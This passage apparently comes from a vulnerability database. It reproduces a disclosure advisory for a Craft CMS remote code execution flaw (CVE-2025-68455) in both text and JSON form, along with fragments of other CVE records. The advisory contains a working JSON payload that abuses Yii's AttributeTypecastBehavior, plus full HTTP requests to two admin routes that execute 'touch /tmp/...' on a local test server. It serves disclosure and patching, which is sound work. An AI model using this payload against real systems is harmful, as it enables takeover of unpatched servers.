"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-470",
"description": "Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-04T19:59:50.982Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-46272",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/46272"
},
{
"name": "Product Reference",
"tags": [
"product"
],
"url": "https://www.microsoft.com/store/productId/9NH1G93D4HKR"
},
{
"name": "VulnCheck Advisory: mart VPN 1.1.3.0 Denial of Service via Search",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/smart-vpn-denial-of-service-via-search"
}
],
"title": "Smart VPN 1.1.3.0 Denial of Service via Search",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2018-25239",
"datePublished": "2026-04-04T13:51:07.117Z",
"dateReserved": "2026-04-04T13:16:20.974Z",
"dateUpdated": "2026-04-06T16:42:33.379Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
GHSA-255J-QW47-WJH5
Vulnerability from github – Published: 2026-01-05 18:50 – Updated: 2026-01-06 15:52Note that attackers must have administrator access to the Craft Control Panel for this to work.
Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
Resources:
https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef
https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7
https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593
https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04
Summary
This was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (5.6.0) version of Craft CMS.
Leveraging a legitimate but maliciously crafted Yii Behavior class, it’s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted Behavior is attached to a Yii Component, and an event is also fired on the tainted Component.
Details
This vulnerability is inspired by CVE-2024-4990 but differs because a legitimate Yii Behavior class is used to abuse the magic __set() and __get() methods to trigger an arbitrary PHP callable, ultimately leading to RCE. As such, this bypasses the mitigations implemented for CVE-2024-4990 and the related CVE-2024-58136.
Using the as <behavior> syntax in JSON POST input, it’s possible to attach Behavior classes to Yii Components, which was the crux of the vulnerability identified in CVE-2024-4990. Fixes for that vulnerability and the related CVE-2024-58136 ensured that only classes of type Behavior could be attached to a Component. Craft CMS also implemented additional logic to prevent arbitrary Behavior classes from being attached to the vulnerable Component.
A new vulnerability has been identified that bypasses the fixes for the previous vulnerabilities by using a legitimate but specially crafted Behavior class, namely the yii\behaviors\AttributeTypecastBehavior. Attaching a Behavior of this type allows the attacker to define an arbitrary callable that is triggered if any event is fired on the tainted Component.
Using a wildcard event listener (specified as on * in JSON input) allows the attacker to catch any event called on the tainted Component and redirect the flow of control to call self::beforeSave of the AttributeTypecastBehavior, triggering the attacker-defined callable and resulting in RCE.
See the commented payload below:
{
"as xxx": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] // Attacker defined callable
},
"typecastBeforeSave": "touch /tmp/touch" // Argument for the callable
}
]
},
"on *": "self::beforeSave" // When any event is fired on the Component, call beforeSave() of the AttributeTypecastBehavior to trigger the attacker-defined callable with the argument above
}
This was found to affect two separate controllers/routes in Craft CMS admin functionality, though others may be affected: * /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings * /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview
PoC
- Install Craft CMS via Composer:
$ composer create-project "craftcms/craft" app
- Use the built-in server to launch Craft CMS:
$ ./craft serve 127.0.0.1:9090
- The following HTTP traces show the payload used to trigger the vulnerability on each of the vulnerable routes:
/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings
POST /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings&v=1763562868146 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:9090/admin/settings/categories/new
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb
X-Registered-Js-Files:
X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B
Content-Length: 1787
Origin: http://127.0.0.1:9090
Connection: keep-alive
Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
{"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","layoutConfig":{"uid":"08ef66f3-f69e-495b-882f-56834efab200","tabs":[{"name":"Content","uid":"6f1efe1c-2de5-4783-ab39-7ff9149a9c90","userCondition":null,"elementCondition":null,"elements":[{"type":"craft\\fieldlayoutelements\\TitleField","inputType":null,"autocomplete":false,"class":null,"size":null,"name":null,"autocorrect":true,"autocapitalize":true,"disabled":false,"readonly":false,"title":null,"placeholder":null,"step":null,"min":null,"max":null,"requirable":false,"id":null,"containerAttributes":[],"inputContainerAttributes":[],"labelAttributes":[],"orientation":null,"label":null,"instructions":null,"tip":null,"warning":null,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":"2025-11-19T06:33:18-08:00","uid":"bae4dcd7-635b-41fe-96a3-4d3d69e91969","userCondition":null,"elementCondition":null},{"type":"craft\\fieldlayoutelements\\CustomField","handle":null,"label":null,"instructions":null,"tip":null,"warning":null,"required":false,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":null,"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","userCondition":null,"elementCondition":null,"fieldUid":"12ac060b-8c40-48a6-b70f-94361245b149","editCondition":null}]}],"generatedFields":[],"cardView":[],"cardThumbAlignment":"end","type":"craft\\elements\\Category"},"elementType":"craft\\elements\\Category","config":{
"as xxx": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"]
},
"typecastBeforeSave": "touch /tmp/touch111"
}
]
},
"on *": "self::beforeSave"
},"settingsNamespace":null,"settings":null}
/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview
POST /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview&v=1763562868148 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:9090/admin/settings/categories/new
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb
X-Registered-Js-Files:
X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B
Content-Length: 424
Origin: http://127.0.0.1:9090
Connection: keep-alive
Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
{"fieldLayoutConfig":{
"as xxx": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"]
},
"typecastBeforeSave": "touch /tmp/touch222"
}
]
},
"on *": "self::beforeSave"
},"cardElements":[],"showThumb":null,"thumbAlignment":"end"}
- Check the filesystem to confirm the creation of the two files in
/tmpand hence confirm RCE:
$ ls -la /tmp/
...
-rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch111
-rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch222
Impact
An attacker with access to Craft CMS admin functionality, specifically the routes listed above, can trigger RCE on the backend server and potentially gain control of the server.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.8.20"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-RC1"
},
{
"fixed": "5.8.21"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.16.16"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-RC1"
},
{
"fixed": "4.16.17"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68455"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-05T18:50:14Z",
"nvd_published_at": "2026-01-05T22:15:52Z",
"severity": "HIGH"
},
"details": "Note that attackers must have administrator access to the Craft Control Panel for this to work.\n\nUsers should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.\n\nResources:\n\nhttps://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef\n\nhttps://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7\n\nhttps://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04\n\n### Summary\n\nThis was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (`5.6.0`) version of Craft CMS.\n\nLeveraging a legitimate but maliciously crafted Yii `Behavior` class, it\u2019s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted `Behavior` is attached to a Yii `Component`, and an event is also fired on the tainted `Component`.\n\n### Details\nThis vulnerability is inspired by `CVE-2024-4990` but differs because a legitimate Yii `Behavior` class is used to abuse the magic `__set()` and `__get()` methods to trigger an arbitrary PHP callable, ultimately leading to RCE. As such, this bypasses the mitigations implemented for `CVE-2024-4990` and the related `CVE-2024-58136`.\n\nUsing the `as \u003cbehavior\u003e` syntax in JSON POST input, it\u2019s possible to [attach](https://www.yiiframework.com/doc/guide/2.0/en/concept-behaviors#attaching-behaviors) `Behavior` classes to Yii `Components`, which was the crux of the vulnerability identified in `CVE-2024-4990`. Fixes for that vulnerability and the related `CVE-2024-58136` ensured that only classes of type `Behavior` could be attached to a `Component`. Craft CMS also implemented additional logic to prevent arbitrary `Behavior` classes from being attached to the vulnerable `Component`.\n\nA new vulnerability has been identified that bypasses the fixes for the previous vulnerabilities by using a legitimate but specially crafted `Behavior` class, namely the `yii\\behaviors\\AttributeTypecastBehavior`. Attaching a `Behavior` of this type allows the attacker to define an arbitrary callable that is triggered if any event is fired on the tainted `Component`.\n\nUsing a [wildcard](https://www.yiiframework.com/doc/guide/2.0/en/concept-events#wildcard-events) event listener (specified as `on *` in JSON input) allows the attacker to catch any event called on the tainted `Component` and redirect the flow of control to call `self::beforeSave` of the `AttributeTypecastBehavior`, triggering the attacker-defined callable and resulting in RCE.\n\nSee the commented payload below:\n\n```json\n{\n \"as xxx\": {\n \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n \"__construct()\": [\n {\n \"attributeTypes\": {\n \"typecastBeforeSave\": [\"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\", \"execute\"] // Attacker defined callable\n },\n \"typecastBeforeSave\": \"touch /tmp/touch\" // Argument for the callable\n }\n ]\n },\n \"on *\": \"self::beforeSave\" // When any event is fired on the Component, call beforeSave() of the AttributeTypecastBehavior to trigger the attacker-defined callable with the argument above\n}\n```\n\nThis was found to affect two separate controllers/routes in Craft CMS admin functionality, though others may be affected:\n* /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings\n* /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview\n\n### PoC\n* Install Craft CMS via Composer:\n```\n$ composer create-project \"craftcms/craft\" app\n```\n* Use the built-in server to launch Craft CMS:\n```\n$ ./craft serve 127.0.0.1:9090\n```\n* The following HTTP traces show the payload used to trigger the vulnerability on each of the vulnerable routes:\n\n**/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings**\n\n```\nPOST /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings\u0026v=1763562868146 HTTP/1.1\nHost: 127.0.0.1:9090\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http://127.0.0.1:9090/admin/settings/categories/new\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nX-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb\nX-Registered-Js-Files: \nX-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B\nContent-Length: 1787\nOrigin: http://127.0.0.1:9090\nConnection: keep-alive\nCookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\n\n{\"uid\":\"c295eb34-dd4c-42ac-8d07-1b8c872a126d\",\"layoutConfig\":{\"uid\":\"08ef66f3-f69e-495b-882f-56834efab200\",\"tabs\":[{\"name\":\"Content\",\"uid\":\"6f1efe1c-2de5-4783-ab39-7ff9149a9c90\",\"userCondition\":null,\"elementCondition\":null,\"elements\":[{\"type\":\"craft\\\\fieldlayoutelements\\\\TitleField\",\"inputType\":null,\"autocomplete\":false,\"class\":null,\"size\":null,\"name\":null,\"autocorrect\":true,\"autocapitalize\":true,\"disabled\":false,\"readonly\":false,\"title\":null,\"placeholder\":null,\"step\":null,\"min\":null,\"max\":null,\"requirable\":false,\"id\":null,\"containerAttributes\":[],\"inputContainerAttributes\":[],\"labelAttributes\":[],\"orientation\":null,\"label\":null,\"instructions\":null,\"tip\":null,\"warning\":null,\"providesThumbs\":false,\"includeInCards\":false,\"width\":100,\"dateAdded\":\"2025-11-19T06:33:18-08:00\",\"uid\":\"bae4dcd7-635b-41fe-96a3-4d3d69e91969\",\"userCondition\":null,\"elementCondition\":null},{\"type\":\"craft\\\\fieldlayoutelements\\\\CustomField\",\"handle\":null,\"label\":null,\"instructions\":null,\"tip\":null,\"warning\":null,\"required\":false,\"providesThumbs\":false,\"includeInCards\":false,\"width\":100,\"dateAdded\":null,\"uid\":\"c295eb34-dd4c-42ac-8d07-1b8c872a126d\",\"userCondition\":null,\"elementCondition\":null,\"fieldUid\":\"12ac060b-8c40-48a6-b70f-94361245b149\",\"editCondition\":null}]}],\"generatedFields\":[],\"cardView\":[],\"cardThumbAlignment\":\"end\",\"type\":\"craft\\\\elements\\\\Category\"},\"elementType\":\"craft\\\\elements\\\\Category\",\"config\":{\n \"as xxx\": {\n \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n \"__construct()\": [\n {\n \"attributeTypes\": {\n \"typecastBeforeSave\": [\"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\", \"execute\"]\n },\n \"typecastBeforeSave\": \"touch /tmp/touch111\"\n }\n ]\n },\n \"on *\": \"self::beforeSave\"\n},\"settingsNamespace\":null,\"settings\":null}\n```\n\n**/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview**\n\n```\nPOST /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview\u0026v=1763562868148 HTTP/1.1\nHost: 127.0.0.1:9090\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http://127.0.0.1:9090/admin/settings/categories/new\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nX-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb\nX-Registered-Js-Files: \nX-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B\nContent-Length: 424\nOrigin: http://127.0.0.1:9090\nConnection: keep-alive\nCookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\n\n{\"fieldLayoutConfig\":{\n \"as xxx\": {\n \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n \"__construct()\": [\n {\n \"attributeTypes\": {\n \"typecastBeforeSave\": [\"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\", \"execute\"]\n },\n \"typecastBeforeSave\": \"touch /tmp/touch222\"\n }\n ]\n },\n \"on *\": \"self::beforeSave\"\n},\"cardElements\":[],\"showThumb\":null,\"thumbAlignment\":\"end\"}\n```\n* Check the filesystem to confirm the creation of the two files in `/tmp` and hence confirm RCE:\n```\n$ ls -la /tmp/\n...\n-rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch111\n-rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch222\n```\n\n### Impact\n\nAn attacker with access to Craft CMS admin functionality, specifically the routes listed above, can trigger RCE on the backend server and potentially gain control of the server.",
"id": "GHSA-255j-qw47-wjh5",
"modified": "2026-01-06T15:52:18Z",
"published": "2026-01-05T18:50:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68455"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior"
}
GHSA-2FPH-6V5W-89HH
Vulnerability from github – Published: 2026-03-24 16:50 – Updated: 2026-03-25 20:59Summary
